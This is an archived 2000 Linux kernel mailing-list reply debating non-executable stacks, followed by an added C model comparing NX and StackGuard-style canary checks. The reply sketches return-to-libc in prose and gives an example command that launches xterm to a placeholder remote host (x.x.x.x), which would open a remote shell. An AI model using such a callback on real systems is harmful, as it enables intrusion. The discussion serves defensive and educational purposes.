Re: Future Linux devel. Kernels

From: Vandoorselaere Yoann (yoann@mandrakesoft.com)
Date: Tue May 09 2000 - 02:55:17 EST


Igmar Palsenberg <maillist@chello.nl> writes:

> >
> > non executable stack gives, as it was said before, a false sense of security;
>
> I agree. Although it makes the life of someone who wants to get in a bit
> harder..
>
> > also, the majority of recent exploits work on non exec stack as it is, at least,
> > as easy to write an exploit for non executable as for executable stack.
>
> Is it ?? Lots of exploits abuse the fact that you can push some code on
> the stack, and that gets executed.. If you can't make that move, it makes
> the job a bit harder..

check http://www.uwsg.indiana.edu/hypermail/linux/kernel/0004.2/0446.html

In short,
Just smash the stack so the function returns to the system() system call
with the parameter pointing at whatever string (for example:
/usr/X11R6/bin/xterm -d x.x.x.x:0.0 )

>
> > So it will not even work on short term.
>
> Restricting the power of root I think is some nice way to make a
> start.. The main goal is still making userland apps secure.

So, use userspace apps to do that, i.e.: stackguard / libsafe.

-- 
                   -- Yoann,  http://www.mandrakesoft.com/~yoann/
     It is well known that M$ products don't call free() after a malloc().
     The Unix community wish them good luck for their future developments.




This archive was generated by hypermail 2b29 : Mon May 15 2000 - 21:00:13 EST
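
An added example, not part of the original message and not StackGuard or libsafe code: a small C model of the argument in this thread, showing that a non-executable-stack check passes when an overwritten return address points at code that already exists, while a StackGuard-style guard word between the buffer and the return address flags the overwrite either way. The address ranges, the guard value, the frame layout and all function names are constructed for the model.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed address map: code pages are executable, stack pages are not. */
#define TEXT_LO  0x08048000u
#define TEXT_HI  0x08100000u
#define STACK_LO 0xbfff0000u
#define CANARY   0x000aff0du   /* guard value chosen for this model */

/* Model frame: a linear overflow of buf crosses canary before saved_ret. */
struct frame {
    char     buf[16];
    uint32_t canary;
    uint32_t saved_ret;
};

/* Non-executable stack policy: only addresses in the code range may run. */
int nx_allows(uint32_t addr) { return addr >= TEXT_LO && addr < TEXT_HI; }

/* StackGuard-style epilogue check: is the guard word unchanged? */
int canary_intact(const struct frame *f) { return f->canary == CANARY; }

/* Models an unbounded copy into buf: writes n bytes from the frame start,
 * clamped to the model frame so the demonstration itself stays in bounds. */
void unbounded_copy(struct frame *f, const void *src, size_t n) {
    if (n > sizeof *f) n = sizeof *f;
    memcpy(f, src, n);
}

/* Returns a bitmask: bit 0 = NX permits the return, bit 1 = canary intact. */
int run_case(uint32_t new_ret, size_t n) {
    struct frame f = { "", CANARY, TEXT_LO + 0x1234 };  /* legitimate return */
    struct frame in;
    memset(&in, 'A', sizeof in);      /* constructed filler input */
    in.saved_ret = new_ret;
    unbounded_copy(&f, &in, n);
    return (nx_allows(f.saved_ret) ? 1 : 0) | (canary_intact(&f) ? 2 : 0);
}

int main(void) {
    printf("return into stack buffer:  %d\n", run_case(STACK_LO + 0x100, sizeof(struct frame)));
    printf("return into existing code: %d\n", run_case(TEXT_LO + 0x5000, sizeof(struct frame)));
    printf("copy that fits in buf:     %d\n", run_case(0, 16));
    return 0;
}
```

A result of 1 in the second case is the point made in the thread: the non-executable stack check alone has nothing to object to, and only the guard-word check reports the corrupted frame.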